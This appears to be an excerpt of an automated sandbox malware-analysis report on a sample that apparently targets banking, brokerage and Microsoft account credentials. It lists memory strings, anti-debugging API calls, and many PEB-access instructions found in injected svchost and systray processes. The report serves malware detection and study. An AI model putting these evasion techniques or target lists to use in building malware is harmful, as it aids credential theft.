Source: Q54E63H5.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Q54E63H5.4.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Q54E63H5.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: systray.exe, 00000004.00000002.4015235910.000000000773B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kers.comVMware20,11696494690}
Source: Q54E63H5.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Q54E63H5.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Q54E63H5.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: systray.exe, 00000004.00000002.4009177930.00000000028B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Q54E63H5.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Q54E63H5.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Q54E63H5.4.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Q54E63H5.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: systray.exe, 00000004.00000002.4015235910.000000000773B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,1
Source: Q54E63H5.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Q54E63H5.4.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: systray.exe, 00000004.00000002.4015235910.000000000773B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pageVMware20,11696494690
Source: n4776Jcum1G.exe, 00000006.00000002.4009313386.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: Q54E63H5.4.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: Q54E63H5.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Q54E63H5.4.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Q54E63H5.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Q54E63H5.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Q54E63H5.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Q54E63H5.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Q54E63H5.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: firefox.exe, 0000000A.00000002.1992692898.00000283B621C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
Source: Q54E63H5.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

API call chain: ExitProcess graph end node

graph_0-86748

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004179D3 LdrLoadDll,

2_2_004179D3

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0045A370 BlockInput,

0_2_0045A370

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

0_2_0040D590

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_043434B0 mov eax, dword ptr fs:[00000030h]	0_2_043434B0
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_04343510 mov eax, dword ptr fs:[00000030h]	0_2_04343510
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_04341E70 mov eax, dword ptr fs:[00000030h]	0_2_04341E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]	2_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]	2_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]	2_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]	2_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]	2_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]	2_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]	2_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]	2_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]	2_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]	2_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]	2_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]	2_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]	2_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]	2_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]	2_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]	2_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]	2_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]	2_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]	2_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]	2_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]	2_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]	2_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]	2_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]	2_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]	2_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]	2_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]	2_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]	2_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]	2_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]	2_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]	2_2_03430750
